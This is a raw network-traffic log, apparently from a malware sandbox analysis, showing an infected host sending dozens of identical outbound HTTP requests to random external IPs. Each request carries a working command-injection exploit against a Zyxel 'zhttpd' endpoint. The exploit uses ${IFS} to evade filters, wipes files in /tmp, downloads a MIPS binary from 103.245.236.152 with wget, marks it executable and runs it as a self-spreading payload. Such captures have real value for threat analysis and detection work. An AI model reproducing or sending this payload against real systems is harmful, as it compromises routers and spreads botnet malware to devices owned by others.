                                            Jan 14, 2024 15:50:47.589896917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6406192.168.2.2351474148.143.47.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589924097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6407192.168.2.233762654.173.226.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589939117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6408192.168.2.2346784105.156.151.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589968920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6409192.168.2.234174858.11.123.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.589998007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6410192.168.2.2350066184.79.226.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590032101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6411192.168.2.2346950135.52.63.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590050936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6412192.168.2.2355166177.97.250.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590081930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6413192.168.2.2346670210.236.235.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590099096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6414192.168.2.235871483.128.159.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590130091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6415192.168.2.2336752188.242.218.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590171099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6416192.168.2.2341062109.5.5.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590199947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6417192.168.2.2334110113.183.186.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590220928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6418192.168.2.2336926187.241.139.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590250969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6419192.168.2.234370281.45.121.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590261936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6420192.168.2.234486696.77.138.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590303898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6421192.168.2.234380671.79.163.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590312004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6422192.168.2.2336674204.191.71.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590334892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6423192.168.2.234515417.205.186.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590401888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6424192.168.2.2347890121.72.65.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590435028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6425192.168.2.2355740184.43.71.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590437889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6426192.168.2.233558272.170.41.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590476990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6427192.168.2.2334868123.224.197.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590502024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6428192.168.2.2337320200.240.113.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590543985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6429192.168.2.235027820.131.146.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590564966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6430192.168.2.234398632.47.71.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590610027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6431192.168.2.2342466156.166.201.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590626001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6432192.168.2.235708645.205.151.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590651035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6433192.168.2.235375819.81.188.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590662956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6434192.168.2.2334130128.106.191.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590728998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6435192.168.2.2342998157.32.209.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590756893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6436192.168.2.235457463.147.9.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590790033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6437192.168.2.2359906164.154.175.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590797901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6438192.168.2.235026693.102.188.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590825081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6439192.168.2.2338106170.134.172.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590857983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6440192.168.2.2358832142.121.150.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590893030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6441192.168.2.235421818.161.216.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590926886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6442192.168.2.233551686.181.64.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590955973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6443192.168.2.2349862163.206.231.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590980053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6444192.168.2.2342604211.136.178.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.590996981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6445192.168.2.234580838.145.82.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591051102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6446192.168.2.234400061.47.82.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591072083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6447192.168.2.235146446.169.214.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591099977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6448192.168.2.233958682.135.190.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591131926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6449192.168.2.234095051.156.61.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591160059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6450192.168.2.2356810179.144.99.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591187000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6451192.168.2.2352604162.172.196.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591209888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6452192.168.2.234264412.185.39.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591248035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6453192.168.2.2360536179.53.5.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591270924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6454192.168.2.2340128136.30.114.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591289043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6455192.168.2.233423663.99.129.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591342926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6456192.168.2.2357234169.77.222.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591372967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6457192.168.2.2351134139.115.150.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591398001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6458192.168.2.2349762144.80.87.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591438055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6459192.168.2.233862261.253.119.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591461897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6460192.168.2.234514880.61.145.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591484070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6461192.168.2.2333488162.164.50.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591547012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6462192.168.2.234531844.171.8.201443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591552973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6463192.168.2.2349882107.130.236.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591593027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6464192.168.2.2337292205.56.15.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591609955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6465192.168.2.2346466160.62.234.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591634989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6466192.168.2.2336216121.19.33.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591670036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6467192.168.2.235312618.31.68.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:47.591691971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6468192.168.2.2334736129.47.225.6443
                                            TimestampBytes transferredDirectionData
